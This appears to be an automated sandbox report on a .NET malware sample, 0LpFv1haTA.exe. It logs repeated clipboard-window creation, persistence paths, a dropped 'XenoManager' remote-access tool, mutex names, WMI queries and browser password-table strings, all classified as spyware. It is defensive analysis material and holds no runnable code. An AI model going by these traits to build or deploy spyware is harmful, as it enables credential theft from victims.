                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      .NET source code contains very large strings
                      Source: 0LpFv1haTA.exe, eK83r.csLong String: Length: 10266
                      Source: 0LpFv1haTA.exe.0.dr, eK83r.csLong String: Length: 10266
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeCode function: 0_2_00007FF848F0325A0_2_00007FF848F0325A
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeCode function: 0_2_00007FF848F02E1C0_2_00007FF848F02E1C
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 7_2_00007FF848F12E1C7_2_00007FF848F12E1C
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 7_2_00007FF848F131C77_2_00007FF848F131C7
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F2928A13_2_00007FF848F2928A
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F131C713_2_00007FF848F131C7
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F1B9ED13_2_00007FF848F1B9ED
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F12E1C13_2_00007FF848F12E1C
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F2A6E213_2_00007FF848F2A6E2
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F1DD7013_2_00007FF848F1DD70
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F238AE13_2_00007FF848F238AE
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F28B0D13_2_00007FF848F28B0D
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 40_2_00007FF848F22E1C40_2_00007FF848F22E1C
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 40_2_00007FF848F2325A40_2_00007FF848F2325A
                      Source: C:\Users\user\AppData\Roaming\manager.exeCode function: 41_2_023B0B8841_2_023B0B88
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 42_2_0322376842_2_03223768
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 42_2_0322435042_2_03224350
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 42_2_03224B8042_2_03224B80
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 42_2_03220B8842_2_03220B88
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 42_2_0322213842_2_03222138
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 42_2_03220B7842_2_03220B78
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 42_2_0322375942_2_03223759
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 45_2_00ED0B8845_2_00ED0B88
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 46_2_00007FF848F32E1C46_2_00007FF848F32E1C
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 46_2_00007FF848F331C746_2_00007FF848F331C7
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 47_2_00007FF848F12E1C47_2_00007FF848F12E1C
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 47_2_00007FF848F131C747_2_00007FF848F131C7
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 48_2_00007FF848F12E1C48_2_00007FF848F12E1C
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 48_2_00007FF848F131C748_2_00007FF848F131C7
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
                      Source: 0LpFv1haTA.exe, 00000000.00000000.2093729342.0000019457B52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
                      Source: 0LpFv1haTA.exeBinary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
                      Source: 0LpFv1haTA.exe.0.drBinary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
                      Source: manager.exe.7.dr, Encryption.csCryptographic APIs: 'CreateDecryptor'
                      Source: manager.exe.41.dr, Encryption.csCryptographic APIs: 'CreateDecryptor'
                      Source: manager.exe.7.dr, Handler.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0LpFv1haTA.exe.0.dr, ub.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0LpFv1haTA.exe.0.dr, ub.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: manager.exe.41.dr, Handler.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0LpFv1haTA.exe, ub.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0LpFv1haTA.exe, ub.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@68/17@3/11
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeFile created: C:\Users\user\AppData\Local\StarlabsJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMutant created: \Sessions\1\BaseNamedObjects\m1ddre3jjw
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeMutant created: \Sessions\1\BaseNamedObjects\Xeno_rat_nd8912d-admin
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5500
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile created: C:\Users\user\AppData\Local\Temp\K-JournalsJump to behavior
                      Source: 0LpFv1haTA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0LpFv1haTA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCA000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DB8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E44A2B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 0LpFv1haTA.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeFile read: C:\Users\user\Desktop\0LpFv1haTA.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\0LpFv1haTA.exe "C:\Users\user\Desktop\0LpFv1haTA.exe"
